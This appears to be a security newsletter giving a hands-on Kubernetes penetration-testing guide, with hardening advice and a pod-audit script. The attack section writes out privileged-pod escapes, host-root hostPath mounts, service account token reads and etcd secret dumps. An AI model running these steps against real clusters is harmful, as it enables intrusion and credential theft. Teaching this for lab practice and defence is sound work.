How to Perform a Kubernetes Penetration Test (Hands-on Guide)
Kubenatives Newsletter - Edition #17
Securing a Kubernetes cluster requires an understanding of potential attack vectors and vulnerabilities. In this issue, we dive into Kubernetes penetration testing—covering hands-on attack scenarios and best practices to defend your cluster.
1. Setting Up the Test Environment
To practice penetration testing in a safe and controlled environment, you can set up a vulnerable Kubernetes cluster using:
Kubernetes Goat – An intentionally vulnerable cluster with various security flaws.
kind or minikube – Local Kubernetes environments to simulate real-world attacks.
Misconfigured Helm charts – Deploying applications with insecure settings for testing.
2. Hands-on Attack Scenarios
Now, let's explore real-world attack scenarios that demonstrate common Kubernetes security flaws.
🔍 Scanning & Reconnaissance
Run kube-hunter to scan for vulnerabilities in the cluster.
kube-hunter --remote <k8s-api-server-ip>
Use kubectl-who-can to check who has access to sensitive resources:
kubectl who-can get pods -A
Identify exposed Kubernetes API servers with misconfigured authentication:
curl -k https://<k8s-api-server>:6443/api/v1/namespaces/default/pods
⚡ Exploiting Misconfigurations
Test for anonymous API access:
kubectl get pods --server=https://<target>
Exploit overly permissive RBAC roles by escalating privileges.
Deploy a pod with privileged mode and attempt a host escape:
apiVersion: v1
kind: Pod
metadata:
  name: privileged-pod
spec:
  containers:
  - name: exploit
    image: alpine
    command: ["/bin/sh"]
    # keep the shell attached to a TTY so the container stays running for kubectl exec
    stdin: true
    tty: true
    securityContext:
      privileged: true

kubectl exec -it privileged-pod -- sh
🔑 Stealing Secrets & Service Account Tokens
Access service account tokens stored inside a pod:
cat /var/run/secrets/kubernetes.io/serviceaccount/token
Extract etcd database contents, which store Kubernetes secrets:
ETCDCTL_API=3 etcdctl get --prefix /registry
🚀 Container Escape & Lateral Movement
Exploit hostPath volume mounts to access the host filesystem:
volumes:
- name: host-root
  hostPath:
    path: /
Check if CAP_SYS_ADMIN is enabled and attempt privilege escalation.
Deploy a malicious container and pivot to other nodes.
3. Best Practices for Securing Kubernetes
Now that we’ve seen how attacks happen, let’s look at how to secure your cluster:
✅ Apply Strong RBAC Policies
Grant least privilege access to users and service accounts.
Prevent anonymous API access.
✅ Restrict Privileged Containers & HostPath Access
Use PodSecurityPolicy (PSP) or Pod Security Standards (PSS). Note that PSP was removed in Kubernetes 1.25, so on current clusters enforce PSS through Pod Security Admission (for example the "restricted" profile, which rejects privileged containers and hostPath volumes).
Deny privileged containers unless explicitly required.
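The settings abused in the attack scenarios above (privileged containers, hostPath mounts of the host root, added SYS_ADMIN capability, and the auto-mounted service account token) are all visible in the pod manifest, so they can be caught before admission or during a cluster review. The following is an added example written for this newsletter, not part of Kubernetes Goat or any tool named on the page: it audits a pod object in the JSON form that `kubectl get pod -o json` emits, using a constructed sample based on the privileged-pod manifest from section 2.

```python
import json

# Constructed sample: the privileged-pod manifest from section 2, extended with the
# hostPath volume and a SYS_ADMIN capability, in the JSON shape kubectl emits.
SAMPLE_POD = json.loads("""
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": {"name": "privileged-pod"},
  "spec": {
    "containers": [{
      "name": "exploit",
      "image": "alpine",
      "securityContext": {"privileged": true,
                          "capabilities": {"add": ["SYS_ADMIN"]}}
    }],
    "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}]
  }
}
""")


def audit_pod(pod: dict) -> list[str]:
    """Return one finding string per risky setting found in the pod spec."""
    findings = []
    spec = pod.get("spec", {})
    containers = spec.get("containers", []) + spec.get("initContainers", [])
    for c in containers:
        name = c.get("name", "<unnamed>")
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            findings.append(f"container {name}: privileged=true")
        # Kubernetes spells capabilities without the CAP_ prefix (SYS_ADMIN, not CAP_SYS_ADMIN).
        for cap in (sc.get("capabilities") or {}).get("add", []):
            if cap.upper() in ("SYS_ADMIN", "ALL"):
                findings.append(f"container {name}: adds capability {cap}")
    for v in spec.get("volumes", []):
        if "hostPath" in v:
            path = v["hostPath"].get("path", "")
            kind = "host root" if path == "/" else "host path"
            findings.append(f"volume {v.get('name', '<unnamed>')}: {kind} mount {path}")
    # The token at /var/run/secrets/kubernetes.io/serviceaccount/token is mounted
    # unless automountServiceAccountToken is explicitly set to false.
    if spec.get("automountServiceAccountToken", True):
        findings.append("service account token auto-mounted into containers")
    return findings


if __name__ == "__main__":
    for finding in audit_pod(SAMPLE_POD):
        print("FINDING:", finding)
```

Feed it the output of `kubectl get pods -A -o json` (iterating over `.items`) to sweep an entire cluster; a pod that yields no findings is one the "restricted" Pod Security Standard would also accept on these four points.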
✅ Enable Kubernetes Audit Logging & Monitoring
Continuously monitor API activity and user actions.
Use Falco, Kubernetes Audit Logs, and Dynatrace for security monitoring.
✅ Implement Network Policies
Restrict pod-to-pod communication using Network Policies.
Prevent lateral movement by attackers within the cluster.
✅ Secure Secrets Management
Store secrets securely using Vault or KMS instead of ConfigMaps.
Rotate credentials and use short-lived access tokens.
✅ Regularly Scan for Vulnerabilities
Run kube-bench to check CIS benchmark compliance:
kube-bench --version 1.6
Use kube-hunter to scan for security issues.
Patch vulnerabilities and update Kubernetes components regularly.
Final Thoughts
Kubernetes security is an ongoing process, and penetration testing is a crucial part of identifying and mitigating risks. By practicing these attack scenarios and implementing the best practices, you can harden your Kubernetes clusters against real-world threats.
🛡️ Want to learn more? Stay tuned for our next newsletter on advanced Kubernetes security hardening techniques.
🚀 Stay Secure & Keep Learning!